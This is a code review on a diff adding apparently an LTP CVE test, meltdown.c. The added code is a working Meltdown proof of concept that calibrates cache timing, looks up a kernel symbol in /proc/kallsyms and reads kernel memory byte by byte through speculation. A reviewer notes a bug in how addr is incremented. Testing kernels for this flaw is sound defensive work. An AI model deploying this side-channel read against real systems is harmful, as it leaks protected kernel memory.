testcases/cve/meltdown.c

```diff
@@ -0,0 +1,295 @@
+}
+
+static int CACHE_HIT_THRESHOLD = 80;
+static int hist[BITS_BY_READ];
+void check(void)
+{
+	int i, time;
+	volatile char *addr;
+
+	for (i = 0; i < BITS_BY_READ; i++) {
+		addr = &target_array[i * TARGET_SIZE];
+
+		time = get_access_time(addr);
+
+		if (time <= CACHE_HIT_THRESHOLD)
+			hist[i]++;
+	}
+}
+
+#define CYCLES 10000
+int readbit(int fd, unsigned long addr, char bit)
+{
+	int i, ret;
+	static char buf[256];
+
+	memset(hist, 0, sizeof(hist));
+
+	for (i = 0; i < CYCLES; i++) {
+		ret = pread(fd, buf, sizeof(buf), 0);
+		if (ret < 0)
+			tst_res(TBROK | TERRNO, "can't read /proc/version");
+
+		clflush_target();
+
+		speculate(addr, bit);
+		check();
+	}
+
+#ifdef DEBUG
+	for (i = 0; i < BITS_BY_READ; i++)
+		tst_res(TINFO, "addr %lx hist[%x] = %d", addr, i, hist[i]);
+#endif
+
+	if (hist[1] > CYCLES / 10)
+		return 1;
+	return 0;
+}
+
+int readbyte(int fd, unsigned long addr)
+{
+	int bit, res = 0;
+
+	for (bit = 0; bit < 8; bit ++ )
+		res |= (readbit(fd, addr, bit) << bit);
+
+	return res;
+}
+
+
+static int mysqrt(long val)
+{
+	int root = val / 2, prevroot = 0, i = 0;
+
+	while (prevroot != root && i < 100) {
+		prevroot = root;
+		root = (val / root + root) / 2;
+	}
+
+	return root;
+}
+
+#define ESTIMATE_CYCLES	1000000
+static void
+set_cache_hit_threshold(void)
+{
+	long cached, uncached, i;
+
+	for (cached = 0, i = 0; i < ESTIMATE_CYCLES; i++)
+		cached += get_access_time(target_array);
+
+	for (cached = 0, i = 0; i < ESTIMATE_CYCLES; i++)
+		cached += get_access_time(target_array);
+
+	for (uncached = 0, i = 0; i < ESTIMATE_CYCLES; i++) {
+		_mm_clflush(target_array);
+		uncached += get_access_time(target_array);
+	}
+
+	cached /= ESTIMATE_CYCLES;
+	uncached /= ESTIMATE_CYCLES;
+
+	CACHE_HIT_THRESHOLD = mysqrt(cached * uncached);
+
+	tst_res(TINFO, "cached = %ld, uncached = %ld, threshold = %d",
+		cached, uncached, CACHE_HIT_THRESHOLD);
+}
+
+static unsigned long
+find_kernel_symbol(const char *name)
+{
+	unsigned long addr;
+	char type;
+	int ret, read;
+	char fmt[strlen(name) + 64];
+
+	sprintf(fmt, "%%lx %%c %s%%c", name);
+
+	ret = SAFE_FILE_LINES_SCANF("/proc/kallsyms", fmt, &addr, &type, &read);
+	if (ret) {
+		tst_brk(TBROK, "can't find '%s'", name);
+		return 0;
+	}
+
+	return addr;
+}
+
+unsigned long addr;
+static void setup(void)
+{
+	set_cache_hit_threshold();
+
+	addr = find_kernel_symbol("linux_proc_banner");
+	if (!addr)
+		tst_brk(TCONF, "can't find 'linux_proc_banner'");
+}
+
+static void run(void)
+{
+	int fd;
+	unsigned int i, score, ret;
+	static char expected[] = "%s version %s";
+	static char read[32];
+	unsigned long size = sizeof(expected) - 1;
+
+	memset(target_array, 1, sizeof(target_array));
+
+	fd = open("/proc/version", O_RDONLY);
+
+	if (set_signal() < 0)
+		tst_res(TBROK | TERRNO, "set_signal");
+
+	for (i = 0; i < size; i++) {
+		ret = readbyte(fd, addr);
+
+		read[i] = ret;
+		tst_res(TINFO, "read %lx = 0x%x %c", addr, ret,
+			isprint(ret) ? ret : ' ');
+
+		addr++;
```

Comment:
When you run "./meltdown -i 3", it works only in first iteration.
This increment should be done to local variable (initialized to addr), so that all variables are same for every iteration of run().